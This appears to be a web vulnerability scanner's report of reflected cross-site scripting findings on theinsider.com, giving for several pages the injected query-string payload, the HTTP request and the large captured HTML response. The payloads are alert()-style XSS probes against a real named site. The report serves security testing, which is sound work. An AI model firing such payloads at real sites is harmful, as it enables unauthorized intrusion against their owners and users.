name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/4249800758/insider_v3/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/swfobject.js" type="text/javascript" ></script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="js/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script type="text/javascript">$(window).load(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class='body keltie_colleen'><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><body class="body"> <div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/contributor_keltie_colleen;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/contributor_keltie_colleen;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/contributor_keltie_colleen;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Keltie+Colleen+Channel+Page+http://insdr.co/qkSMa1+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/contributor/contributor.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col1"> <div id='channel_title_bar' class='keltie_colleen'> <a href=''><img src='/media/img/channel_page_name_keltie_colleen.png' style='margin-left: 190px; margin-top: 0px;' alt='' /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'><img src='/media/photo/2011/12/100354/vid_keltie_416_111205.jpg' class='channel_vid_img' height='380' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'>Cody Simpson Talks Girls & Dolls!</a></h4></div><div class='vid_excerpt'><p>Last week the internet combusted with the rumor that Cody Simpson was dating Kylie Jenner, after the two were spotted together at The Grove.</p><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_keltie_colleen.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>gossip</span><a href='/gossip/47165_Idol_Winner_Named_New_Artist_of_the_Year/index.html'>'Idol' Winner Named New Artist of the Year</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/47164_Robert_Downey_Jr_s_Having_a/index.html'>Robert Downey Jr.'s Having a ... </a></li></ul></div><div class='clearfix'></div><div class='channelblock rightblock'><a target='_self' href='/music/46958_Javier_Colon_Exclusive_sneak_peek/index.html' class='black_text_link'><img src='/media/photo/2011/12/99956/keltie_colleen_javier_colon_416.jpg' height='380' width='640' class='channel_vid_img' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/46958_Javier_Colon_Exclusive_sneak_peek/index.html' class='black_text_link'>On the Set of Javier Colon's First Music Video!</a></h4></div><div class='vid_excerpt'><p>The first time I saw Javier Colon on <em>The Voice</em>, I knew he would win. There is just something about his voice that truly transcends any genre and give you goosebumps. On top of all of his vocal talents, Javier is also an incredibly nice guy. I found out just how wonderful when he invited me on the set for an exclusive behind the scenes look at his new music video featuring Natasha Bedingfield for <em>As Long As We Got Love</em>.</p><a target='_self' href='/music/46958_Javier_Colon_Exclusive_sneak_peek/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_keltie_colleen.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>Full Episode</span><a href='/full_episode/43329_Daily_Full_Episode/index.html'>Watch the Latest Full Episode</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html'>Celebs Hit Las Vegas [Pics]</a></li></ul></div><div class='clearfix'></div><div class='channelblock leftblock'><a target='_self' href='/music/46868_Hot_Chelle_Rae_Giveaway_and_interview/index.html' class='black_text_link'><img src='/media/photo/2011/11/99298/INS_KELTIE_HCRPIC_416.jpg' class='channel_vid_img' height='380' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music..
- /inc/huffpost/display/43462_Huffpost_Display/index.html

/inc/huffpost/display/43462_Huffpost_Display/index.html

http://www.theinsider.com/inc/huffpost/display/43462_Huffpost_Display/index.html?'%22--%3E%3C/style%..

Parameters

Parameter Type Value
entryid GET 1129874
Query Based QUERYSTRING '"--></style></script><script>alert(0x0008AB)</script>

Request

GET /inc/huffpost/display/43462_Huffpost_Display/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:56:35 GMT
Content-Length: 13537
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title> - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="Huffington Post Display" /> <meta name="date" content="2010-07-17 09:08:00" /><meta property="og:title" content="" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/inc/huffpost/display/43462_Huffpost_Display/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2010-07-17 09:08:00" /><Attribute name="sdate" value="20100717" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/Huffington Post Display_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/Huffington Post Display_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/Huffington Post Display_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Huffpost+Display+http://insdr.co/uqJYFO+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/huffpost/display/css/huffpost.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>#huffpost_para { margin: 0 auto 20px; width: 640px;}#headline_popeater h1{margin-top:10px; width: 680px; margin: 0 auto; font-size: 28px; letter-spacing: -1px; font-family: 'AvalonBold',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif !important; font-weight: bold; text-transform: uppercase;}.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><img src="/media/img/huffPo700px.jpg" class="channel_title_logo" alt="" /></div><!-- END CHANNEL TITLE --><!-- Begin Article Display --> <div id="test_story_wrapper"> <div id="popeater_story_wrapper"> <div class="content_wrapper"> <div class="linkback3"> <!-- <a href="http://www.popeater.com" target="_blank">popeater link</a> --> </div> <div id="headline_popeater"> <h1></h1> </div> <div id="article_date" style="font-size:10px; margin: 10px 20px;"><div style="color: #666;"> By <br/> </div> </div> <div id="huffpost_para"> <img src='' style='display:block;float:left;margin: 0px 20px 10px 0;'> </div> </div><!-- End Article Display --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"></div><p class='article'><h3></h3><p class='publish_date'></p><p class='publish_date'>July 17, 2010</p><p>

























</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/inc/huffpost/display/43462_Huf..
- /movies/index.html

/movies/index.html

http://www.theinsider.com/movies/index.html?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0002BE)</script>

Request

GET /movies/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/search/index.html?sort=date-sdate
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:55:05 GMT
Content-Length: 11561
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Movie News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="movies" /> <meta name="date" content="2011-10-21 17:41:00" /><meta property="og:title" content="Movie News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/movies/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Movie News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 17:41:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var 